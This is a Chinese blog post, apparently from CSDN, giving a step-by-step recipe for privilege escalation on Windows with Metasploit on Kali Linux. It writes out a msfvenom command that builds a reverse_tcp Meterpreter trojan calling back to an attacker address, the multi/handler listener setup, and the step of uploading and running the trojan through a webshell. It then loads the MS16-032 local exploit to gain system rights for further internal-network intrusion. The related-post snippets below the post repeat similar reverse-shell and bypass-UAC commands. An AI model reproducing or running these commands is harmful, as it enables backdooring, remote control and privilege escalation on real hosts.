kali下msf提权

已于 2023-06-08 19:26:50 修改
阅读量4.7k 收藏 9
点赞数 2
分类专栏: kali linux 文章标签: 网络安全 web安全 网络攻击模型
于 2018-09-23 16:07:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/82822717
版权
  1. 生成木马

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

  1. 配置监听程序

  Msfconsole 打开Metaploit

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

现在将1.exe 通过菜刀或者webshell 上次到可写目录,并且执行

这样就监听成功了  获得一个session (会话)

Getuid 查看主机名

shell 进入命令行模式

当然这里也可以加载exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 加载exp

Session 1 返回之前的会话

Exploit 进行提权

这说明exp执行成功,可以进一步提权,内网渗透了

丢了少年失了心1
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用MSF进行提权(windows提权linux提权、wesng使用)
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
Linux 提权学习
Goodric的博客
04-15 904
提权的目的是获取 root 权限 root 权限可获取 shadow 文件中的密码 Hash,若内网环境中存在「账户/密码复用」的情况,可用于横向扩展
使用MSF进行提权(windows提权linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 649
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
LINUX提权之第三方服务提权
ALLEN'Blog
12-14 655
总结了一下第三方服务器提权,相比于其他提权方法还是挺简单的,只需要找到对应第三方服务的漏洞即可尝试提权,当然我们也可以在MSF里找到对应的payload,仔细学习一下还是挺好理解的,本文就讲到这里,喜欢的话不妨一键三连。
msf】对ubuntu系统进行提权
qq_20410657的博客
10-08 756
查询内核漏洞 寻找内核漏洞-匹配 查找到内核漏洞的文件 使用gcc编译内核漏洞执行程序 上传漏洞执行程序到ubuntu系统 进行shell提权 提权失败 渗透总结
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1397
getshell之后的提权
kali 渗透msf
11-14
kali渗透测试利器
kali linux msf系列视频教程
10-25
kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
Kali msf教程
08-24
kali linux msf系列教程
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
LinuxWEBSHELL提权一技
06-15
LinuxWEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
生命在于学习——Linux提权
易水哲的博客
11-03 1646
Linux提权的学习笔记记录。
Linux系统漏洞本地提权
xiongIT的博客
11-23 2037
如何预防Linux系统漏洞本地提权
Msf提权步骤
aiquan9342的博客
10-24 748
1、生成反弹木马(脚本,执行程序) msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe 2、MSF接受设置 1 use exploit/multi/handle...
渗透测试中常用端口及利用
weixin_43102772的博客
03-08 1768
渗透测试中常用端口及利用 端口服务入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持/欺骗 110 pop...
内网渗透-权限提升(使用MSF提权的一些方法)
Ping_Pig的博客
07-03 3215
讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法 直接输入提升权限命令 meterpreter>getsystem 使用MSF内置bypassuac提权 MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。 search bypassuac Matching Modules ================ # Name ...
Linux 提权
qq_53742230的博客
07-17 2232
Linux 的一些常用提权手法
MSF运用外部module提权
土拨鼠挖洞中的博客
06-23 1189
1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ;  2 useexploit/linux/telnet/AF_PACKET  3 showoptions 4  exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) &gt; sessions -l  选择...
kali linux msf
10-06
kali linux msf是指在Kali Linux系统中使用Msfvenom和Msfconsole等软件进行渗透测试的过程。...5. 在目标系统中执行各种操作,如信息收集、提权、横向移动、数据盗取等。 6. 清理痕迹,以避免被检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值